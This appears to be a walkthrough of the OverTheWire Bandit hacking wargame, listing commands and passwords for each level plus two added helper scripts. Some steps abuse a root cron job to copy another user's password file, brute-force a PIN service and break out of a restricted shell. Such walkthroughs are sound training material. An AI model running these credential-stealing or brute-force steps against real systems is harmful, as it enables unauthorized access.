OverTheWire
A hacking wargame:
https://overthewire.org/wargames/bandit/
Reference solutions:
https://www.bilibili.com/video/BV1ao4y1x7gT/?spm_id_from=333.999.0.0 (same version as this writeup; liked, coined and favorited)
https://blog.csdn.net/weixin_47610939/article/details/122509060 (slightly different version)
Level 0
Connect to bandit.labs.overthewire.org over ssh
Username and password: bandit0
ssh bandit0@bandit.labs.overthewire.org -p 2220
Enter the password
Logged in
For every later level, once you have found the password, ssh in again as the next bandit user.
Level 0 → Level 1
ls
cat readme
Level 1 → Level 2
NH2SXQwcBdpmTEzi3bvBHMM9H66vVXjL
ls
cat ./-
Running cat - by itself prints nothing, because a bare - means standard input; to treat - as a filename you must give it a path (./-).
Level 2 → Level 3
rRGizSaX8Mk1RTb1CNQoXTcYZWU6lgzi
ls
cat spaces\ in\ this\ filename
或
cat "spaces in this filename"
On Linux, spaces in a filename must be escaped with a backslash or the whole name quoted.
Level 3 → Level 4
aBZ0W5EmUfAf7kHTQeOwd8bauFJ2lAiG
ls
cd inhere
ls -a
cat .hidden
Level 4 → Level 5
2EW7BBsr6aMMoJ2HjW067dm8EgX26xNe
ls
cd inhere
ls
tail ./-*
Level 5 → Level 6
lrIWWI6bB37kxfiCQZqUdOIYfr6eEeqR
ls
cd inhere
ls
find . -size 1033c
cat ./maybehere07/.file2
Level 6 → Level 7
P4L4vucdmLnm8I7Vl7jG1ApGSfjYKqJU
cd /
find . -size 33c -user bandit7 -group bandit6 2>/dev/null
cat ./var/lib/dpkg/info/bandit7.password
Level 7 → Level 8
z7WtoNQU2XfjmMtWA8u5rN4vzqu4v99S
ls
grep -srn "millionth"
或
cat data.txt | grep millionth
Level 8 → Level 9
TESKZC0XvTetK0S9xNwm25STk5iWrBvP
sort data.txt | uniq -u
Level 9 → Level 10
EN632PlfYiZbn3PhVK3XOGSlNInNE00t
strings data.txt | grep ==
strings prints the sequences of printable characters found in an object or binary file.
Level 10 → Level 11
G7w8LIi6J3kTb8A7j9LgrywtEUlyyp6s
base64 -d data.txt
data.txt is base64-encoded (an encoding, not encryption); decoding it yields the password.
Level 11 → Level 12
6zPeziLdR2RKNdNYFNb6nVCKzphlXHBM
cat data.txt | tr 'a-zA-Z' 'n-za-mN-ZA-M'
Letters are shifted by 13 positions (ROT13); tr maps each letter to the one 13 places along, and since 13 is half the alphabet the same mapping also decodes.
Level 12 → Level 13
JVNBBFSmZwKKOP0XbFXOoW8chDz5yVRv
bandit12@bandit:~$ mkdir /tmp/bandit12
bandit12@bandit:~$ cp -r data.txt /tmp/bandit12/
bandit12@bandit:~$ cd /tmp/bandit12
bandit12@bandit:/tmp/bandit12$ ls
data.txt
bandit12@bandit:/tmp/bandit12$ file data.txt
data.txt: ASCII text
bandit12@bandit:/tmp/bandit12$ cat data.txt | xxd -r
(binary output, unreadable on the terminal; write it to a file instead)
bandit12@bandit:/tmp/bandit12$ cat data.txt | xxd -r > hexdump
bandit12@bandit:/tmp/bandit12$ file hexdump
hexdump: gzip compressed data, was "data2.bin", last modified: Sun Apr 23 18:04:23 2023, max compression, from Unix, original size modulo 2^32 581
bandit12@bandit:/tmp/bandit12$ mv hexdump hexdump.gz
bandit12@bandit:/tmp/bandit12$ gzip -d hexdump.gz
bandit12@bandit:/tmp/bandit12$ file hexdump
hexdump: bzip2 compressed data, block size = 900k
bandit12@bandit:/tmp/bandit12$ mv hexdump hexdump.bz2
bandit12@bandit:/tmp/bandit12$ bzip2 -d hexdump.bz2
bandit12@bandit:/tmp/bandit12$ file hexdump
hexdump: gzip compressed data, was "data4.bin", last modified: Sun Apr 23 18:04:23 2023, max compression, from Unix, original size modulo 2^32 20480
bandit12@bandit:/tmp/bandit12$ mv hexdump hexdump.gz
bandit12@bandit:/tmp/bandit12$ gzip -d hexdump.gz
bandit12@bandit:/tmp/bandit12$ file hexdump
hexdump: POSIX tar archive (GNU)
bandit12@bandit:/tmp/bandit12$ ls
data.txt hexdump
bandit12@bandit:/tmp/bandit12$ tar xvf hexdump
data5.bin
bandit12@bandit:/tmp/bandit12$ ls
data5.bin data.txt hexdump
bandit12@bandit:/tmp/bandit12$ file data5.bin
data5.bin: POSIX tar archive (GNU)
bandit12@bandit:/tmp/bandit12$ tar xvf data5.bin
data6.bin
bandit12@bandit:/tmp/bandit12$ file data6.bin
data6.bin: bzip2 compressed data, block size = 900k
bandit12@bandit:/tmp/bandit12$ mv data6.bin data6.bz2
bandit12@bandit:/tmp/bandit12$ bzip2 -d data6.bz2
bandit12@bandit:/tmp/bandit12$ ls
data5.bin data6 data.txt hexdump
bandit12@bandit:/tmp/bandit12$ file data6
data6: POSIX tar archive (GNU)
bandit12@bandit:/tmp/bandit12$ tar xvf data6
data8.bin
bandit12@bandit:/tmp/bandit12$ file data8.bin
data8.bin: gzip compressed data, was "data9.bin", last modified: Sun Apr 23 18:04:23 2023, max compression, from Unix, original size modulo 2^32 49
bandit12@bandit:/tmp/bandit12$ mv data8.bin data8.gz
bandit12@bandit:/tmp/bandit12$ gzip -d data8.gz
bandit12@bandit:/tmp/bandit12$ file data8
data8: ASCII text
bandit12@bandit:/tmp/bandit12$ cat data8
The password is wbWdlBxEir4CaE8LaPhauuOo6pwRmrDw
Summary: create a working directory under /tmp, reverse the hexdump with xxd -r, identify each layer with file, rename it to the matching extension, decompress or untar, and repeat until the data is plain text.
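The manual loop above (file, rename, decompress, repeat) written as a script. This is an added example and not part of the original writeup or of OverTheWire: it identifies each layer from its magic bytes, which is what file(1) does, and handles the three container types the level uses (gzip, bzip2, tar). It assumes the hexdump has already been reversed with xxd -r into a binary file; make_fixture builds a constructed nested blob with a made-up password so the script can be tried offline.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): peel nested gzip / bzip2 /
# tar layers automatically by checking magic bytes, which is what the manual
# mv + file + gzip -d / bzip2 -d / tar xvf loop above does by hand.
# Assumes the xxd -r step has already turned the hexdump into a binary file.
set -eu

# Identify the container format of $1 from its magic bytes, like file(1):
# prints gzip, bzip2, tar or other.
detect_type() {
    magic=$(od -An -tx1 -N3 "$1" | tr -d ' \n')
    case "$magic" in
        1f8b*)  echo gzip;  return 0 ;;        # gzip: 1f 8b
        425a68) echo bzip2; return 0 ;;        # bzip2: "BZh"
    esac
    # POSIX/GNU tar puts the string "ustar" at offset 257 of the header
    if [ "$(dd if="$1" bs=1 skip=257 count=5 2>/dev/null)" = "ustar" ]; then
        echo tar
    else
        echo other
    fi
}

# Unwrap $1 layer by layer in a fresh temp dir; prints the path of the
# innermost (non-container) file. Stops after 20 layers as a safety cap.
unwrap_all() {
    work=$(mktemp -d)
    cp "$1" "$work/layer"
    cur="$work/layer"
    n=0
    while [ "$n" -lt 20 ]; do
        n=$((n + 1))
        case "$(detect_type "$cur")" in
            gzip)
                mv "$cur" "$cur.gz"            # gzip -d wants the .gz suffix
                gzip -d "$cur.gz" ;;           # recreates $cur, decompressed
            bzip2)
                mv "$cur" "$cur.bz2"
                bzip2 -d "$cur.bz2" ;;
            tar)
                member=$(tar -tf "$cur" | head -n 1)   # single-member archives here
                tar -xf "$cur" -C "$work"
                rm "$cur"
                cur="$work/$member" ;;
            other)
                echo "$cur"
                return 0 ;;
        esac
    done
    echo "unwrap_all: more than 20 layers, giving up" >&2
    return 1
}

# Constructed fixture for offline testing: the same nesting order as the level
# (gzip > tar > bzip2 > tar > gzip > text), with a made-up password.
make_fixture() {
    d=$(mktemp -d)
    printf 'The password is EXAMPLEPASSWORD\n' > "$d/data9.bin"
    gzip "$d/data9.bin" && mv "$d/data9.bin.gz" "$d/data8.bin"
    (cd "$d" && tar -cf data6.bin data8.bin && rm data8.bin)
    if command -v bzip2 >/dev/null 2>&1; then
        bzip2 "$d/data6.bin" && mv "$d/data6.bin.bz2" "$d/data5.bin"
    else
        mv "$d/data6.bin" "$d/data5.bin"       # skip the bzip2 layer if absent
    fi
    (cd "$d" && tar -cf data4.bin data5.bin && rm data5.bin)
    gzip "$d/data4.bin" && mv "$d/data4.bin.gz" "$d/blob"
    echo "$d/blob"
}

# Usage: sh peel.sh <file>   (e.g. the output of: xxd -r data.txt > blob)
if [ "${1:-}" != "" ]; then
    cat "$(unwrap_all "$1")"
fi
```

Checking magic bytes rather than trusting the file name is the whole point of the level: the extension is meaningless here, so the script never looks at it, and the suffix is only added because gzip and bzip2 insist on it.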
Level 13 → Level 14
wbWdlBxEir4CaE8LaPhauuOo6pwRmrDw
ssh bandit14@bandit.labs.overthewire.org -p 2220 -i sshkey.private
yes    # accept the host key prompt
cat /etc/bandit_pass/bandit14
Log in to bandit14 with the private key, then read bandit14's password.
Level 14 → Level 15
fGrHPx402xGC7U7rXKDaxiWFTOiF0ENq
nc localhost 30000
fGrHPx402xGC7U7rXKDaxiWFTOiF0ENq
For this level, send bandit14's password to port 30000; nc does the job.
Level 15 → Level 16
jN2kgmIXJ6fShzhT2avhotn4Zcka6tnt
openssl s_client localhost:30001
jN2kgmIXJ6fShzhT2avhotn4Zcka6tnt
Connect to port 30001 over TLS with openssl s_client and send the current level's password; the reply contains bandit16's.
Level 16 → Level 17
JQttfApK4SeyHwDlI9SXGR50qclOAil1
nmap localhost -p 31000-32000
nmap localhost -sV -p 31046,31518,31691,31790,31960
openssl s_client localhost:31790    # I tried the first SSL port first and got nothing back
JQttfApK4SeyHwDlI9SXGR50qclOAil1
Then save the returned private key. I wanted to save it under /tmp/bandit16 but found that directory already existed.
cd /tmp/bandit16
ssh bandit17@bandit.labs.overthewire.org -p 2220 -i bandit17.key    # the key file must be readable only by you (mode 600), or ssh refuses to use it
whoami
cat /etc/bandit_pass/bandit17
Level 17 → Level 18
VwOSWtCA7lRKkTfbr2IDh6awj9RNZM5e
diff passwords.new passwords.old
42c42
< hga5tuuCLF6fFzUpnagiMN8ssu9LFrdg
---
> glZreTEH1V3cGKL6g4conYqZqaEj0mte
Level 18 → Level 19
hga5tuuCLF6fFzUpnagiMN8ssu9LFrdg
Logging in to this level directly prints "Byebye!" and the session closes, because .bashrc has been modified to log you out; run the command through ssh itself instead of an interactive shell to read the file.
ssh bandit18@bandit.labs.overthewire.org -p 2220 "cat ./readme"
Level 19 → Level 20
awhqfNnAbc1naukrpqDYcF95h7HoMTrC
./bandit20-do whoami
# output: bandit20
./bandit20-do cat /etc/bandit_pass/bandit20
hard
Level 20 → Level 21
VxCazJaVykI6W36BkBU0mJTCM8rR95XT
There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).
nc -lvp 8989 &
./suconnect 8989 &
jobs
fg 1
VxCazJaVykI6W36BkBU0mJTCM8rR95XT
You can also do this from a second terminal window instead of using job control.
Level 21 → Level 22
NvEJF7oVjkddltPSrdKEFOllh9V1IBcq
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
cd /etc/cron.d
ls
cat cronjob_bandit22
cat /usr/bin/cronjob_bandit22.sh
cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Level 22 → Level 23
WdDozAdTM2z9DiFEQ2mGlwngMfj4EZff
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.
Level 23 → Level 24
QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
What the cron script does: it runs every script under /var/spool/bandit24/foo/ as bandit24 and then deletes it. So drop a script there that copies bandit24's password to a file you can read.
vim /tmp/b24.sh     # contents of the script:
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/b24pw
chmod 777 /tmp/b24.sh          # it must be executable by bandit24; 755 would suffice
cp /tmp/b24.sh /var/spool/bandit24/foo/
cat /tmp/b24pw                 # run this a few times; the cron job has to fire first, so the file may not exist yet
Level 24 → Level 25
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
You do not need to create new connections each time
Brute force is required: pipe all 10000 candidates through a single connection and look for the one reply that is not "Wrong!".
for i in {0000..9999};do echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar $i;done | nc localhost 30002
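The single-connection brute force above, broken into pieces so the 10000 replies can be filtered rather than read by eye. This is an added example, not part of the original writeup or of OverTheWire; fake_daemon, its message texts and the MOCK_* secrets are constructed so it runs offline, and the real transport is nc localhost 30002 exactly as in the command above.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): the single-connection
# brute force from the level above, split into reusable pieces so the
# response can be filtered instead of read by eye. The mock daemon and its
# message texts are constructed for offline testing; the real target is
# "nc localhost 30002".
set -eu

# Print all 10000 "password pin" lines, zero-padded, in PIN order.
gen_candidates() {
    awk -v pw="$1" 'BEGIN { for (i = 0; i < 10000; i++) printf "%s %04d\n", pw, i }'
}

# Keep only the line that follows "Correct!" (the next-level password);
# everything else (banner, 9999 "Wrong!" lines) is dropped.
extract_hit() {
    awk '/^Correct/ { if ((getline line) > 0) print line; exit }'
}

# brute_force PASSWORD TRANSPORT [ARGS...]
# Streams every candidate through one TRANSPORT process (e.g. nc localhost 30002)
# and prints the password it returns, or nothing if no pin was accepted.
brute_force() {
    pw=$1; shift
    gen_candidates "$pw" | "$@" | extract_hit
}

# Constructed stand-in for the port-30002 daemon: one reply per input line,
# then the answer once the right pin arrives. Secrets below are made up.
MOCK_PASSWORD=VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar   # bandit24's password from the page
MOCK_PIN=7312                                     # made up; the real pin is unknown
MOCK_NEXT_PASSWORD=EXAMPLE_BANDIT25_PASSWORD      # made up
fake_daemon() {
    echo "I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space."
    while IFS=' ' read -r pw pin; do
        if [ "$pw" = "$MOCK_PASSWORD" ] && [ "$pin" = "$MOCK_PIN" ]; then
            echo "Correct!"
            echo "The password of user bandit25 is $MOCK_NEXT_PASSWORD"
            return 0
        fi
        echo "Wrong! Please enter the correct current password and pincode. Try again."
    done
}

# Real use on the box (password read from the file rather than pasted):
#   brute_force "$(cat /etc/bandit_pass/bandit24)" nc localhost 30002
```

Keeping the transport as an argument is what makes the loop testable: the same pipeline runs against fake_daemon here and against nc on the target, and the daemon's "you do not need a new connection each time" hint is honoured because every candidate goes through one process.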
Level 25 → Level 26
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.
bandit25's home directory holds the key for bandit26, but bandit26's login shell is not /bin/bash: it is a script that just pages a text file with more and then exits, so a normal login drops you straight back out.
Shrink the terminal window until the text no longer fits on one screen, so that more pauses at its prompt instead of exiting. At that prompt press v to open the file in vi, then from vi set the shell option to /bin/bash and spawn a shell from the editor.
Level 26 → Level 27
c7GvcKlw9mC7aUQaPx7nwFstuAIBw1o1 (log in the same way as in the previous level)
Level 27 → Level 28
YnQpBuifNMas1hcUFk70ZmqkhUU2EuaS
There is a git repository at ssh://bandit27-git@localhost/home/bandit27-git/repo via the port 2220. The password for the user bandit27-git is the same as for the user bandit27. Clone the repository and find the password for the next level.
git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repo
cd repo
cat README
Level 28 → Level 29
AVanL161y9rsbcJIsFHuw35rjaOM19nR
There is a git repository at ssh://bandit28-git@localhost/home/bandit28-git/repo via the port 2220. The password for the user bandit28-git is the same as for the user bandit28. Clone the repository and find the password for the next level.
The password in README was overwritten in a later commit; walk the git log with its diffs to recover the earlier version.
Level 29 → Level 30
tQKvmcwNYcFS6vmPHIUSI3ShmsrQZK8S
There is a git repository at ssh://bandit29-git@localhost/home/bandit29-git/repo via the port 2220. The password for the user bandit29-git is the same as for the user bandit29. Clone the repository and find the password for the next level.
The password is not on the default branch; switch to the dev branch and it is in the file there.
Level 30 → Level 31
xbhV3HpNGlTIdnjUrdAlPzc2L6y9EOnS
The password is hidden in a git reference (a tag), not in any commit's files.
Level 31 → Level 32
OoffzGDlzhAlerFJ2cAiz1D41JW1Mhmt
Create the file the README asks for, commit it and push; the password comes back in the push output. Note the repository's .gitignore covers the file, so it has to be force-added.
Level 32 → Level 33
rmCBvG56y58BXzv98yZGdO7ATVL5dW8y
Level 33 → Level 34
odHo63fHiFqcWWJG9rLiLDtPm45KzUKy
At this moment, level 34 does not exist yet.